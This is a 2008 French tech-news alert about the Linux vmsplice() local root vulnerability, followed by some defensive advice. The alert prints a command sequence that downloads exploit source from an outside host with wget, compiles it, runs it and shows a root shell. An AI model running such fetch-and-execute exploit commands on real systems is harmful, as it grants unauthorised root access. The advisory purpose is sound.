Free Tools

Votre publicité ici ?


Top des logiciels

1. HxD Hex Editor 1.6.1 (327 fois)

2. Open Office 2.2.1 (294 fois)

3. Delphi 6 (253 fois)

4. Windows Live Messenger (175 fois)

5. FireFox 2.0.0.12 (135 fois)


En bref

03 Sept 2008 Google Chrome : le navigateur 100 % Made In Google... ou presque !

28 Août 2008 Internet Explorer 8 : toutes les nouveautĂ©s du navigateur

18 Août 2008 Windows 7 : tout savoir sur le prochain système de Microsoft

13 Août 2008 The Pirate Bay censurĂ© en Italie - L'arrĂŞt de mort du rĂ©seau P2P ?

11 Août 2008 Hop : le nouveau tĂ©lĂ©phone jetable Ă  15€

Consulter les archives


Les derniers dossiers


Les ressources Delphi et C/C++

Music Pro Package

Afficher la date et heure du jour

Fonction affine

Alignement de séquences d'ADN

TatNum : gestion des images avec Qt


Membres en ligne :

Mordem


Nos partenaires

Espacerezo

KilaSoft


À votre tour, devenez partenaire de mx-dev.net.



Logo mx-dev.net

Le 1er du Web - Voter pour mx-dev.net


Vous êtes ici : AccueilAlertes › Faille critique pour Linux

Faille critique pour Linux

Une faille qualifiée de "hautement critique" a été découverte pour le noyau du système d'exploitation libre.

Une vulnérabilité concernant les versions 2.6.17 à 2.6.24.1 des noyaux de Linux vient d'être découverte. Elle permet via l'exploitation d'un bug dans l'appel système vmsplice() à un utilisateur ayant un simple compte utilisateur de passer en administrateur (root).

L'exploit critique pourrait être appelé utilisé avec par exemple le code suivant :

cd /tmp
wget http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
./vmsplice-local-root-exploit
...
[root@localhost tmp]# id
uid=0(root) gid=0(root) groups=505(sbilbeau)

Pour vous prémunir de ce genre de problème :

  1. N'installez jamais de compilateurs (gcc, g++, javac, ...)
  2. Mettez fréquement votre système à jour
  3. Quand une mise à jour du noyau est faite, redémarrez systèmatiquement votre système afin que le patch soit pris en compte.
Merci à Tux Planet pour leurs informations.

Posté le 19 Février 2008 à 11h32 par Matt 261.


Envoyer par e-mail | Imprimer | Ajouter aux favoris